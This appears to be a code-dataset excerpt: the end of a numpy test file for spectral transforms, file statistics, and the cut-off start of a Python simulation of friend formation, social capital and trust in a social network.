basis_functions=[BasisFunctions.COMPLEX_EXP, BasisFunctions.COSINE],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_cosine_both(arrays, st, parameters):
spectral, physical = arrays
p = parameters
x = np.linspace(0, 1.0, p.nx, endpoint=True)
z = np.linspace(0, 1.0, p.nz, endpoint=True)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = (
np.cos(np.pi * Z)
+ 2.0 * np.cos(2 * np.pi * Z)
+ np.cos(np.pi * X)
+ 2.0 * np.cos(2 * np.pi * X) * np.cos(1 * np.pi * Z)
)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.COSINE, BasisFunctions.COSINE],
)
true_spectral = np.zeros_like(spectral)
true_spectral[0, 1] = 1.0
true_spectral[0, 2] = 2.0
true_spectral[1, 0] = 1.0
true_spectral[2, 1] = 2.0
true_spectral[-1, 0] = 1.0
true_spectral[-2, 1] = 2.0
# np.set_printoptions(suppress=True, precision=4)
# print(spectral)
# print(true_spectral)
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[BasisFunctions.COSINE, BasisFunctions.COSINE],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_sine_both(arrays, st, parameters):
spectral, physical = arrays
p = parameters
x = np.linspace(0, 1.0, p.nx, endpoint=True)
z = np.linspace(0, 1.0, p.nz, endpoint=True)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = np.sin(np.pi * Z) * np.sin(np.pi * X) + 2.0 * np.sin(
2 * np.pi * Z
) * np.sin(3 * np.pi * X)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.SINE, BasisFunctions.SINE],
)
true_spectral = np.zeros_like(spectral)
true_spectral[1, 1] = 1.0
true_spectral[-1, 1] = -1.0
true_spectral[3, 2] = 2.0
true_spectral[-3, 2] = -2.0
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[BasisFunctions.SINE, BasisFunctions.SINE],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_sine_x_periodic_z(arrays, st, parameters):
spectral, physical = arrays
p = parameters
x = np.linspace(0, 1.0, p.nx, endpoint=True)
z = np.linspace(0, 1.0, p.nz, endpoint=False)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = np.sin(np.pi * X) + 2.0 * np.sin(2 * np.pi * X)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.SINE, BasisFunctions.COMPLEX_EXP],
)
true_spectral = np.zeros_like(spectral)
true_spectral[1, 0] = 1.0
true_spectral[-1, 0] = -1.0 # x is sine, complex conj is negative
true_spectral[2, 0] = 2.0
true_spectral[-2, 0] = -2.0
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[BasisFunctions.SINE, BasisFunctions.COMPLEX_EXP],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_sine_x_cosine_z(arrays, st, parameters):
spectral, physical = arrays
p = parameters
x = np.linspace(0, 1.0, p.nx, endpoint=True)
z = np.linspace(0, 1.0, p.nz, endpoint=True)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = np.sin(np.pi * X) + 2.0 * np.sin(2 * np.pi * X)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.SINE, BasisFunctions.COSINE],
)
true_spectral = np.zeros_like(spectral)
true_spectral[1, 0] = 1.0
true_spectral[-1, 0] = -1.0 # x is sine, complex conj is negative
true_spectral[2, 0] = 2.0
true_spectral[-2, 0] = -2.0
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[BasisFunctions.SINE, BasisFunctions.COSINE],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_cosine_x_sine_z(arrays, st, parameters):
spectral, physical = arrays
p = parameters
x = np.linspace(0, 1.0, p.nx, endpoint=True)
z = np.linspace(0, 1.0, p.nz, endpoint=True)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = (
np.cos(np.pi * X) * np.sin(np.pi * Z)
+ 2.0 * np.cos(3 * np.pi * X) * np.sin(2 * np.pi * Z)
+ 3.0 * np.sin(2 * np.pi * Z)
)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.COSINE, BasisFunctions.SINE],
)
true_spectral = np.zeros_like(spectral)
true_spectral[1, 1] = 1.0
true_spectral[-1, 1] = 1.0 # x is cosine, complex conjugate is the same
true_spectral[0, 2] = 3.0
true_spectral[3, 2] = 2.0
true_spectral[-3, 2] = 2.0
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[BasisFunctions.COSINE, BasisFunctions.SINE],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_periodic_x_fdm_z(fdm_parameters):
p = fdm_parameters
array_factory = ArrayFactory(fdm_parameters, np)
st = SpectralTransformer(fdm_parameters, np, array_factory=array_factory)
spectral = array_factory.make_spectral()
physical = array_factory.make_physical()
x = np.linspace(0, 1.0, p.nx, endpoint=False)
z = np.linspace(0, 1.0, p.nz)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = (
3.0 + np.cos(2 * np.pi * X) + 2.0 * np.cos(2 * 2 * np.pi * X)
)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.COMPLEX_EXP, BasisFunctions.FDM],
)
true_spectral = np.zeros_like(spectral)
true_spectral[0, :] = 3.0
true_spectral[1, :] = 1.0 / 2
true_spectral[2, :] = 2.0 / 2
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[BasisFunctions.COMPLEX_EXP, BasisFunctions.FDM],
)
assert_array_almost_equal(physical, true_physical)
| 26.82808
| 77
| 0.640073
| 1,332
| 9,363
| 4.313063
| 0.065315
| 0.112794
| 0.015666
| 0.041775
| 0.868755
| 0.856571
| 0.854656
| 0.84282
| 0.838468
| 0.815144
| 0
| 0.034792
| 0.238706
| 9,363
| 348
| 78
| 26.905172
| 0.771184
| 0.038129
| 0
| 0.719368
| 0
| 0
| 0.002223
| 0
| 0
| 0
| 0
| 0
| 0.075099
| 1
| 0.043478
| false
| 0
| 0.019763
| 0
| 0.071146
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d238c50f355bd558a2d9be4903fe2fbd247c63c2
| 73,798
|
py
|
Python
|
social_capital/adv_cred_functions.py
|
zguo1010/osd
|
e0df06b6586b224c5ac035b5a2a1536a39c3ca45
|
[
"MIT"
] | null | null | null |
social_capital/adv_cred_functions.py
|
zguo1010/osd
|
e0df06b6586b224c5ac035b5a2a1536a39c3ca45
|
[
"MIT"
] | null | null | null |
social_capital/adv_cred_functions.py
|
zguo1010/osd
|
e0df06b6586b224c5ac035b5a2a1536a39c3ca45
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import scipy
import scipy.stats
import warnings
import math
import time
import random
from numpy.random import choice, randint, seed
from datetime import date
from copy import deepcopy
import os
from multiprocessing import Process, Value, Array
'''change max values'''
def maximum_cap(data, feature='ave_share', thresh=0.05, binnum=10):
result1 = np.histogram(data.loc[data['label'] == "Fake", :][feature], bins=binnum)
cnt1 = sum(data['label'] == "Fake")
xmax1 = result1[1][-1]
# Legit class
result2 = np.histogram(data.loc[data['label'] == "Legit", :][feature], bins=binnum)
cnt2 = sum(data['label'] == "Legit")
xmax2 = result2[1][-1]
# set x-axix cut
xval = max(result1[1][sum(result1[0] >= cnt1 * thresh)],
result2[1][sum(result2[0] >= cnt2 * thresh)])
data.loc[data[feature] > xval, feature] = xval
return
'''drawing best fit probability density functions'''
def fitting_distribution(data, feature='verified', dname='FakeLikers', method='SC', drawing=False, binnum=20, out=20):
xmax = max(data[feature])
xmin = min(data[feature])
# Fake Class
result1 = np.histogram(data.loc[data['label'] == "Fake", :][feature], bins=binnum, range=(xmin, xmax))
cnt1 = sum(data['label'] == "Fake")
x1 = result1[1]
y1 = data.loc[data['label'] == "Fake", :][feature]
# Legit class
result2 = np.histogram(data.loc[data['label'] == "Legit", :][feature], bins=binnum, range=(xmin, xmax))
cnt2 = sum(data['label'] == "Legit")
x2 = result2[1]
y2 = data.loc[data['label'] == "Legit", :][feature]
# histogram with same height
height = max(np.max(result1[0]) / cnt1, np.max(result2[0]) / cnt2)
tmp = round(height * 10) / 10
if tmp < height:
height = tmp + 0.1
else:
height = tmp
width = result1[1][1] - result1[1][0]
dist_names = ['alpha', 'anglit', 'arcsine', 'beta', 'betaprime', 'binom', 'bradford', 'burr', 'cauchy', 'chi',
'chi2', 'cosine',
'dgamma', 'dweibull', 'erlang', 'expon', 'exponnorm', 'exponweib', 'exponpow', 'f', 'fatiguelife',
'fisk',
'foldcauchy', 'foldnorm', 'genlogistic', 'genpareto', 'gennorm', 'genexpon',
'genextreme', 'gausshyper', 'gamma', 'gengamma', 'genhalflogistic', 'gilbrat', 'gompertz', 'gumbel_r',
'gumbel_l', 'halfcauchy', 'halfnorm', 'halfgennorm', 'hypsecant', 'invgamma', 'invgauss',
'halflogistic',
'invweibull', 'johnsonsb', 'johnsonsu', 'ksone', 'kstwobign', 'laplace', 'levy_l',
# 'levy','levy_stable',
'logistic', 'loggamma', 'loglaplace', 'lognorm', 'lomax', 'maxwell', 'mielke', 'nakagami', 'ncx2',
'ncf',
'nct', 'norm', 'pareto', 'pearson3', 'powerlaw', 'powerlognorm', 'powernorm', 'rdist', 'reciprocal',
'rayleigh', 'rice', 'recipinvgauss', 'semicircular', 't', 'triang', 'truncexpon', 'truncnorm',
'tukeylambda',
'uniform', 'vonmises', 'vonmises_line', 'wald', 'weibull_min', 'weibull_max', 'wrapcauchy']
# best fit probability model for Fake class
best_name1 = 'expon'
best_distribution1 = getattr(scipy.stats, best_name1)
best_sse1 = np.inf
best_params1 = (0.0, 1.0)
for dist_name in dist_names:
try:
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
# Fit dist data
dist = getattr(scipy.stats, dist_name)
params = dist.fit(y1)
# Separate parts of parameters
arg = params[:-2]
loc = params[-2]
scale = params[-1]
# Calculate fitted PDF and error with fit in distribution
pdf = dist.pdf(x1[:-1], loc=loc, scale=scale, *arg) * width
sse = np.sum(np.power(result1[0] / cnt1 - pdf, 2.0))
# Identify if this distribution is better
if best_sse1 > sse > 0:
best_distribution1 = dist
best_params1 = params
best_sse1 = sse
best_name1 = dist_name
except Exception:
pass
# plot the best fit curve for Fake class
if drawing == True:
plt.figure(figsize=(7, 5))
plt.ylim(0, height)
width = result1[1][1] - result1[1][0]
if x1[-1] > 40:
x1_list = np.arange(x1[-1])
elif x1[-1] > 5:
x1_list = np.arange(0, x1[-1], 0.2)
elif x1[-1] > 0.5:
x1_list = np.arange(0, x1[-1], 0.05)
else:
x1_list = np.arange(0, x1[-1], 0.005)
pdf_fitted1 = best_distribution1.pdf(x1_list, *best_params1[:-2], loc=best_params1[-2],
scale=best_params1[-1]) * width
# Draw histogram with density for Fake class
plt.bar(x1[:-1], result1[0] / cnt1, width=width * 0.75, color='r', alpha=0.1, label='Attackers')
plt.plot(x1_list, pdf_fitted1, label='Attackers: ' + best_name1, color='r')
# best fit probability model for Legit class
best_name2 = 'expon'
best_distribution2 = getattr(scipy.stats, best_name2)
best_sse2 = np.inf
best_params2 = (0.0, 1.0)
for dist_name in dist_names:
try:
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
# Fit dist data
dist = getattr(scipy.stats, dist_name)
params = dist.fit(y2)
# Separate parts of parameters
arg = params[:-2]
loc = params[-2]
scale = params[-1]
# Calculate fitted PDF and error with fit in distribution
pdf = dist.pdf(x2[:-1], loc=loc, scale=scale, *arg) * width
sse = np.sum(np.power(result2[0] / cnt2 - pdf, 2.0))
# identify if this distribution is better
if best_sse2 > sse > 0:
best_distribution2 = dist
best_params2 = params
best_sse2 = sse
best_name2 = dist_name
except Exception:
pass
# plot the best fit curve for Legit class
if drawing == True:
if x2[-1] > 40:
x2_list = np.arange(x2[-1])
elif x2[-1] > 5:
x2_list = np.arange(0, x2[-1], 0.2)
elif x2[-1] > 0.5:
x2_list = np.arange(0, x2[-1], 0.05)
else:
x2_list = np.arange(0, x2[-1], 0.005)
pdf_fitted2 = best_distribution2.pdf(x2_list, *best_params2[:-2], loc=best_params2[-2],
scale=best_params2[-1]) * width
# Draw histogram with density for Legit class
plt.bar(x2[:-1], result2[0] / cnt2, width=width * 0.75, color='b', alpha=0.1, label='Legit Users')
plt.plot(x2_list, pdf_fitted2, label='Legit: ' + best_name2, color='b', linestyle='--')
if feature == 'between':
plt.xlabel('Betweenness: FDS-' + method, fontsize=20)
# plt.xscale('log')
else:
plt.xlabel('Social capital dimension: ' + feature, fontsize=20)
plt.ylabel('Probability', fontsize=20)
plt.tick_params(axis='both', labelsize=16)
if dname == '1ks10kn' and feature == 'human':
plt.legend(fontsize=18, loc='upper left', framealpha=0.3)
else:
plt.legend(fontsize=18)
if dname == 'FakeLikers':
plt.gcf().subplots_adjust(left=0.11)
plt.gcf().subplots_adjust(top=1.0)
plt.gcf().subplots_adjust(right=1.0)
plt.savefig('resultliker/' + out + '/' + feature + '_' + method + '.png', dpi=300)
if dname == 'Cresci15':
plt.gcf().subplots_adjust(left=0.13)
plt.gcf().subplots_adjust(top=0.98)
plt.gcf().subplots_adjust(right=1.0)
plt.savefig('resultcres/' + out + '/' + feature + '_' + method + '.png', dpi=300)
if dname == 'INT':
plt.gcf().subplots_adjust(left=0.11)
plt.gcf().subplots_adjust(top=1.0)
plt.gcf().subplots_adjust(right=1.0)
plt.savefig('resultint/' + out + '/' + feature + '_' + method + '.png', dpi=300)
elif dname == '1ks10kn':
plt.gcf().subplots_adjust(left=0.13)
plt.gcf().subplots_adjust(top=0.98)
plt.gcf().subplots_adjust(right=1.0)
plt.savefig('result1ks/' + out + '/' + feature + '_' + method + '.png', dpi=300)
#else:
plt.clf()
return best_name1, best_distribution1, best_params1, best_name2, best_distribution2, best_params2
'''Return list of nodes need friends'''
def friend_pending(G):
pending = []
for (i, x) in G.nodes(data='full'):
if x == False:
pending.append(i)
return pending
'''Return Graph capital data to likers for plotting'''
def capital_return(capital, G, feature='structural'):
for i in G.nodes():
val = G.nodes[i][feature]
capital.at[i, feature] = val
'''Show how many nodes reached friends limit'''
def friend_full(G):
f = 0
for (i, x) in G.nodes(data='full'):
if x == True:
f = f + 1
return f / G.order()
# find best fit probability density functions
def fitting_post(data, dname, feature='friends', method='SC', binnum=20, out='20'):
xmax = max(data[feature])
xmin = min(data[feature])
# Fake Class
result1 = np.histogram(data.loc[data['label'] == "Fake", :][feature], bins=binnum, range=(xmin, xmax))
cnt1 = sum(data['label'] == "Fake")
x1 = result1[1]
y1 = data.loc[data['label'] == "Fake", :][feature]
# Legit class
result2 = np.histogram(data.loc[data['label'] == "Legit", :][feature], bins=binnum, range=(xmin, xmax))
cnt2 = sum(data['label'] == "Legit")
x2 = result2[1]
y2 = data.loc[data['label'] == "Legit", :][feature]
# draw histogram with same height
height = max(np.max(result1[0]) / cnt1, np.max(result2[0]) / cnt2)
tmp = round(height * 10) / 10
if tmp < height:
height = tmp + 0.1
else:
height = tmp
dist_names = ['alpha', 'anglit', 'arcsine', 'beta', 'betaprime', 'binom', 'bradford', 'burr', 'cauchy', 'chi',
'chi2', 'cosine',
'dgamma', 'dweibull', 'erlang', 'expon', 'exponnorm', 'exponweib', 'exponpow', 'f', 'fatiguelife',
'fisk',
'foldcauchy', 'foldnorm', 'genlogistic', 'genpareto', 'gennorm', 'genexpon',
'genextreme', 'gausshyper', 'gamma', 'gengamma', 'genhalflogistic', 'gilbrat', 'gompertz', 'gumbel_r',
'gumbel_l', 'halfcauchy', 'halfnorm', 'halfgennorm', 'hypsecant', 'invgamma', 'invgauss',
'halflogistic',
'invweibull', 'johnsonsb', 'johnsonsu', 'ksone', 'kstwobign', 'laplace', 'levy_l',
# 'levy','levy_stable',
'logistic', 'loggamma', 'loglaplace', 'lognorm', 'lomax', 'maxwell', 'mielke', 'nakagami', 'ncx2',
'ncf',
'nct', 'norm', 'pareto', 'pearson3', 'powerlaw', 'powerlognorm', 'powernorm', 'rdist', 'reciprocal',
'rayleigh', 'rice', 'recipinvgauss', 'semicircular', 't', 'triang', 'truncexpon', 'truncnorm',
'tukeylambda',
'uniform', 'vonmises', 'vonmises_line', 'wald', 'weibull_min', 'weibull_max', 'wrapcauchy'] # 86
width = result1[1][1] - result1[1][0]
# plt.figure(figsize=(7,5))###
plt.bar(x1[:-1], result1[0] / cnt1, width=width * 0.75, color='r', alpha=0.1, label='Fake')
# -----------without pmf
plt.bar(x2[:-1], result2[0] / cnt2, width=width * 0.75, color='b', alpha=0.1, label='Legit')
#plt.xlabel('Social capital dimension: ' + feature, fontsize=18)
plt.xlabel(dname + ' Degrees: ', fontsize=18)
plt.ylabel('Probability', fontsize=18)
plt.legend(loc='upper right')
#plt.title("Histogram of " + feature + " from method: " + method + " friend")
if dname == 'FakeLikers':
plt.savefig('resultliker/' + out + '/' + feature + '_' + method + '.png')
elif dname == 'Cresci15':
plt.savefig('resultcres/' + out + '/' + feature + '_' + method + '.png')
elif dname == 'INT':
plt.savefig('resultint/' + out + '/' + feature + '_' + method + '.png')
elif dname == '1ks10kn':
plt.savefig('result1ks/' + out + '/' + feature + '_' + method + '.png')
plt.clf()
# -----------
'''Adding likers data to Graph'''
def node_attributes(likers, G, feature):
for (i, x) in enumerate(likers[feature].values):
if feature == 'friends':
G.nodes[likers.index[i]][feature] = int(x)
else:
G.nodes[likers.index[i]][feature] = x
'''Adding likers data to Graph'''
def node_attributes_edges(likers, G, dname):
for (i, x) in enumerate(likers['friends'].values):
G.nodes[likers.index[i]]['edge_interaction'] = math.ceil(x / 80)
'''Adding social capital data to Graph'''
def node_attributes_sc(likers, G):
for (i, x) in enumerate(likers['human'].values):
G.nodes[likers.index[i]]['capital'] = G.nodes[likers.index[i]]['human'] \
+ G.nodes[likers.index[i]]['cognitive'] + G.nodes[likers.index[i]]['relational']
'''Initialize graph nodes with attributes'''
def initialization_graph(likers, capital, n, dname):
G = nx.empty_graph(n)
# Fill features from likers
nx.set_node_attributes(G, 0, 'edges')
nx.set_node_attributes(G, False, 'full')
node_attributes(likers, G, 'friends')
node_attributes(likers, G, 'label')
node_attributes_edges(likers, G, dname)
# Fill in static social capital
node_attributes(capital, G, 'human')
node_attributes(capital, G, 'cognitive')
node_attributes(capital, G, 'relational')
node_attributes_sc(capital, G) #capital
# Dynamic SC
nx.set_node_attributes(G, 0, 'STC')
nx.set_node_attributes(G, 0, 'CC')
nx.set_node_attributes(G, 0, 'RC')
nx.set_node_attributes(G, 0, 'SC')
# Behavioral seeds
node_attributes(capital, G, 'feeding')
node_attributes(capital, G, 'posting')
node_attributes(capital, G, 'feedback')
node_attributes(capital, G, 'inviting')
# credibility judgement
nx.set_node_attributes(G, 1, 'experience') #normal user
node_attributes(capital, G, 'competence') #normal user
node_attributes(capital, G, 'deception') #attacker+compromised user
# trust
nx.set_node_attributes(G, 0, 'trust')
nx.set_node_attributes(G, 1, 'fmax')
nx.set_node_attributes(G, 1, 'bmax')
# Attack model
nx.set_node_attributes(G, '', 'phish')
nx.set_node_attributes(G, 0, 'compromise')
print(G.nodes[0])
return G
'''Adding an new edge'''
def new_friend(G, u, v):
G.add_edge(u, v, f=1, b=1) #initial feeding and feedback count
# update friend count and full
for i in [u, v]:
G.nodes[i]['edges'] = G.nodes[i]['edges'] + 1
if G.nodes[i]['edges'] >= G.nodes[i]['friends']:
G.nodes[i]['full'] = True
'''Update social capital and structural capital'''
def social_capital_update(G, i):
stc, cc, rc, tu = 0, 0, 0, 0
neighbor_len = len(list(G.neighbors(i)))
for j in list(G.neighbors(i)): #adding trust as weight
trust = G.edges[i, j]['f'] / G.nodes[i]['fmax'] + G.edges[i, j]['b'] / G.nodes[i]['bmax']
stc = stc + G.nodes[j]['human'] * trust/2
cc = cc + G.nodes[j]['cognitive'] * trust/2
rc = rc + G.nodes[j]['relational'] * trust/2
G.nodes[i]['STC'] = stc / neighbor_len
G.nodes[i]['CC'] = cc / neighbor_len
G.nodes[i]['RC'] = rc / neighbor_len
G.nodes[i]['SC'] = (G.nodes[i]['CC'] + G.nodes[i]['RC'] + G.nodes[i]['STC'])/ 3
'''Update social capital and structural capital'''
def social_capital_trust_update(G, i):
stc, cc, rc, tu = 0, 0, 0, 0
neighbor_len = len(list(G.neighbors(i)))
for j in list(G.neighbors(i)): #adding trust as weight
trust = G.edges[i, j]['f'] / G.nodes[i]['fmax'] + G.edges[i, j]['b'] / G.nodes[i]['bmax']
stc = stc + G.nodes[j]['human'] * trust/2
cc = cc + G.nodes[j]['cognitive'] * trust/2
rc = rc + G.nodes[j]['relational'] * trust/2
trustj = G.edges[i, j]['f'] / G.nodes[j]['fmax'] + G.edges[i, j]['b'] / G.nodes[j]['bmax']
tu = tu + trustj / 2
G.nodes[i]['STC'] = stc / neighbor_len
G.nodes[i]['CC'] = cc / neighbor_len
G.nodes[i]['RC'] = rc / neighbor_len
G.nodes[i]['SC'] = (G.nodes[i]['CC'] + G.nodes[i]['RC'] + G.nodes[i]['STC'])/ 3
G.nodes[i]['trust'] = tu / neighbor_len
'''Each user initial 5 friends'''
def initial_friend_SC(G, feature, run, dname):
rnd = int(1000*random.random())
print("initial SC seed:", rnd)
random.seed(rnd)
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
for i in range(5):
for j in pending:
if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6: #leave space for very small number of friends
continue
# find all possible k
friend_j = list(G.neighbors(j))
list_k = pending[:] #deepcopy
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
# collect all k to node_list
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False and G.nodes[k]['edges'] < 7:
node_list0[k] = G.nodes[k][feature]
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
ranked = list(node_list.keys()) # ascending
#select top 1 value
while flag == 0:
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['full'] == False and G.nodes[f]['edges'] < 7:
new_friend(G, j, f)
flag = 1
del node_list[f]
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): #update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): #updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
pending = friend_pending(G)
random.shuffle(pending)
#after 5 times
for i in list(G.nodes()): #update sc and trust values
social_capital_trust_update(G, i)
print(G.size())
return G
'''Each user initial 5 friends'''
def initial_friend_TR(G, run, dname):
rnd = int(1000*random.random())
print("initial TR seed:", rnd)
random.seed(rnd)
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
for i in range(5):
for j in pending:
if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6: #leave space for very small number of friends
continue
# find all possible k
friend_j = list(G.neighbors(j))
list_k = pending[:] #deepcopy
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
# collect all k to node_list
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False:
node_list0[k] = G.nodes[k]['feeding'] + G.nodes[k]['feedback']
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
ranked = list(node_list.keys()) # ascending
#select top 1 value
while flag == 0:
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['full'] == False:
new_friend(G, j, f)
flag = 1
del node_list[f]
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): #update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): #updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
pending = friend_pending(G)
random.shuffle(pending)
#after 5 times
for i in list(G.nodes()): #update sc and trust values
social_capital_trust_update(G, i)
print(G.size())
return G
'''Each user initial 5 friends'''
def initial_friend_SA(G, run, dname):
rnd = int(1000*random.random())
print("initial SA seed:", rnd)
random.seed(rnd)
# adjacency matrix to save similarity
size = max(G.nodes()) + 1
product_matrix = np.zeros((size, size))
for x in G.nodes():
dot_x = [G.nodes[x]['human'], G.nodes[x]['cognitive'], G.nodes[x]['relational']]
for y in G.nodes():
if y > x:
dot_y = [G.nodes[y]['human'], G.nodes[y]['cognitive'], G.nodes[y]['relational']]
mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
product_matrix[x][y] = mut
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
for i in range(5):
for j in pending:
if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6: #leave space for very small number of friends
continue
# find all possible k
friend_j = list(G.neighbors(j))
list_k = pending[:] #deepcopy
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
if len(list_k) == 0:
G.nodes[j]['full'] = True
continue
# collect all k to node_list
node_list0 = {}
for k in list_k:
if G.nodes[k]['full'] == False:
node_list0[k] = product_matrix[min(j, k)][max(j, k)]
if len(node_list0) == 0:
G.nodes[j]['full'] = True
continue
node_list = {}
for k in node_list0.keys():
node_list[k] = node_list0[k]
if len(node_list) == 0:
continue
# rank node_list and pick top 1
node_list = {k: v for k, v in sorted(node_list.items(), key=lambda item: item[1])}
flag = 0
ranked = list(node_list.keys()) # ascending
#select top 1 value
while flag == 0:
if len(node_list) == 0 or G.nodes[j]['full'] == True:
break
ranked = list(node_list.keys()) # ascending
f = ranked[-1]
if G.nodes[f]['full'] == False and G.nodes[j]['edges'] < 7:
new_friend(G, j, f)
flag = 1
del node_list[f]
# simulate positive interaction
for j in list(G.nodes()):
if G.nodes[j]['feeding'] >= random.random(): # if feeding, share to all friends
for fb in list(G.neighbors(j)): #update feeding
G.edges[j, fb]['f'] = G.edges[j, fb]['f'] + 1
if G.edges[j, fb]['f'] > G.nodes[j]['fmax']:
G.nodes[j]['fmax'] = G.edges[j, fb]['f']
if G.edges[j, fb]['f'] > G.nodes[fb]['fmax']:
G.nodes[fb]['fmax'] = G.edges[j, fb]['f']
if G.nodes[fb]['feedback'] >= random.random(): #updating feedback
G.edges[j, fb]['b'] = G.edges[j, fb]['b'] + 1
if G.edges[j, fb]['b'] > G.nodes[j]['bmax']:
G.nodes[j]['bmax'] = G.edges[j, fb]['b']
if G.edges[j, fb]['b'] > G.nodes[fb]['bmax']:
G.nodes[fb]['bmax'] = G.edges[j, fb]['b']
pending = friend_pending(G)
random.shuffle(pending)
#after 5 times
for i in list(G.nodes()): #update sc and trust values
social_capital_trust_update(G, i)
print(G.size())
return G
'''Each user initial 5 friends'''
def initial_friend_TP(G, topics, run, dname):
rnd = int(1000*random.random())
print("initial TP seed:", rnd)
random.seed(rnd)
# adjacency matrix to save similarity
size = max(G.nodes()) + 1
product_matrix = np.zeros((size, size))
for x in G.nodes():
dot_x = topics.loc[x]
for y in G.nodes():
if y > x:
dot_y = topics.loc[y]
mut = np.dot(dot_x, dot_y) / np.linalg.norm(dot_x) / np.linalg.norm(dot_y)
product_matrix[x][y] = mut
pending = friend_pending(G)
random.shuffle(pending)
full_nodes = set(G.nodes()) - set(pending)
for i in range(5):
for j in pending:
if G.nodes[j]['edges'] / G.nodes[j]['friends'] > 0.4 or G.nodes[j]['edges'] > 6: #leave space for very small number of friends
continue
# find all possible k
friend_j = list(G.neighbors(j))
list_k = pending[:] #deepcopy
list_k.remove(j)
list_k = list(set(list_k) - set(friend_j))
